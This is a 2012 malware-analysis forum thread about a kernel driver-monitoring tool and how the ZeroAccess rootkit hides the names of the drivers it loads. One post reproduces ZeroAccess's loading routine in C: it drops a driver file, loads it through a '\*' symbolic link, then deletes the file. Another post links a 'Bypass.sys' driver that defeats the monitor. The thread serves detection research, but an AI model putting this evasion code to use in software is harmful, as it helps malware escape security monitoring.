A forum for reverse engineering, OS internals and malware analysis 

Forum for announcements and questions about tools and software.
 #12277  by kmd
 Fri Mar 23, 2012 6:31 am
When next version will be published? soon will year passed after this
This kind of spoofing is not handled by current available 1.2 version. As well as load-from-header.
All these resolved in v2.0 that is ready for about 1 month.
 #12282  by EP_X0FF
 Fri Mar 23, 2012 8:25 am
kmd wrote:When next version will be published? soon will year passed after this
This kind of spoofing is not handled by current available 1.2 version. As well as load-from-header.
All these resolved in v2.0 that is ready for about 1 month.
We decided to do not release newer version (2.x) to the public. Overall it's now completely different application than that attached here.
 #12384  by Brock
 Thu Mar 29, 2012 5:44 am
Haven't followed this thread in forever but now have seen talk of this Zero Access Trojan/RK "spoofing" ImageInfo->FileName unicode_string ? I don't have a sample of this but wouldn't this driver logically still need to be loaded prior to DrvMon running and other such tools??? Anyhow, instead of using ImageInfo->FileName directly one could, if the flag for ExtendedInfoPresent in passed ImageInfo is set, use the IMAGE_INFO_EX structure instead which provides a FILE_OBJECT pointer to the driver, ObQueryNameString on file object pointer and the driver name should be revealed? Of course, this could be "spoofed" too but perhaps with more work? My suggested bypass doesn't need "kernel mode" help, it is a PE optionalheader structure member that changes and complicates things, so I am curious to see what ZA is doing. Reverser comments welcomed ;)


P.S> My bypass driver link updated due to being a dead download link, thanks to xqrzd for pointing this out
http://uploading.com/files/6cd371e8/Bypass.sys
 #12418  by EP_X0FF
 Sat Mar 31, 2012 3:01 am
Brock wrote:Haven't followed this thread in forever but now have seen talk of this Zero Access Trojan/RK "spoofing" ImageInfo->FileName unicode_string ? I don't have a sample of this but wouldn't this driver logically still need to be loaded prior to DrvMon running and other such tools??? Anyhow, instead of using ImageInfo->FileName directly one could, if the flag for ExtendedInfoPresent in passed ImageInfo is set, use the IMAGE_INFO_EX structure instead which provides a FILE_OBJECT pointer to the driver, ObQueryNameString on file object pointer and the driver name should be revealed? Of course, this could be "spoofed" too but perhaps with more work? My suggested bypass doesn't need "kernel mode" help, it is a PE optionalheader structure member that changes and complicates things, so I am curious to see what ZA is doing. Reverser comments welcomed ;)
Code: Select all
BOOL LoadDriverZAccess(
	PWSTR DriverName,
	PWSTR RegistryPath,
	PBYTE BinaryBuffer,
	ULONG BinaryBufferSize,
	PNTSTATUS pStatus
	)
{
	BOOL result = FALSE;
	NTSTATUS ns = STATUS_UNSUCCESSFUL;
	UNICODE_STRING drvname;
	UNICODE_STRING str1;
	OBJECT_ATTRIBUTES attr;
	HANDLE Link;

	__try {

		RtlSecureZeroMemory(tmpBuffer, BUFFER_SIZE);
		wcscpy(tmpBuffer, L"\\??\\");
		if (GetSystemDirectory(&tmpBuffer[4], MAX_PATH))	{

			wcscat(tmpBuffer, L"\\drivers\\");
			wcscat(tmpBuffer, DriverName);

			ns = (NTSTATUS)NativeWriteBufferToFile(

				&tmpBuffer[4], 
				BinaryBuffer, 
				BinaryBufferSize, 
				FALSE, 
				FALSE
				);
				
			if (NT_SUCCESS(ns)) {

				RtlInitUnicodeString(&str1, L"\\*");
				RtlInitUnicodeString(&drvname, tmpBuffer);
				InitializeObjectAttributes(&attr, &str1, OBJ_CASE_INSENSITIVE, 0, NULL);
				ns = NtCreateSymbolicLinkObject(&Link, SYMBOLIC_LINK_ALL_ACCESS, &attr, &drvname); 
				if (NT_SUCCESS(ns)) {

					ns = NativeLoadDriver(TEXT("\\*"), RegistryPath, NULL);
					result = NT_SUCCESS(ns);

					NtClose(Link);
				}
				RtlInitUnicodeString(&drvname, tmpBuffer);
				InitializeObjectAttributes(&attr, &drvname, OBJ_CASE_INSENSITIVE, 0, NULL);
				NtDeleteFile(&attr);
			}
		}

		if (pStatus)
			*pStatus = ns;

	} __except (EXCEPTION_EXECUTE_HANDLER) {

		result = FALSE;

	}
	return result;
}
do not know how latest ZA doing this, but ZA from 2011 was working that way. Expand and decode symlink (could be multiple A->B->...->Z) and that is all.

IMAGE_INFO_EX is unavailable prior to Vista.
 #12420  by Brock
 Sat Mar 31, 2012 3:44 am
@EP_X0FF,
IMAGE_INFO_EX is unavailable prior to Vista.
Yes, I am aware of this as I still run XP 32-bit natively but even now Vista is old too :lol:

Thanks for the pseudo-code for loading its driver, interesting indeed. Would it be impolite of me to request a sample of ZA (doesn't matter which variant) if you have one? If it's too sensitive perhaps via private message?
 #13823  by m5home
 Fri Jun 08, 2012 10:54 pm
Support WIN64 now?
 #13827  by EP_X0FF
 Sat Jun 09, 2012 3:50 am
m5home wrote:Support WIN64 now?
Yes, win8 too, about year ago.

Image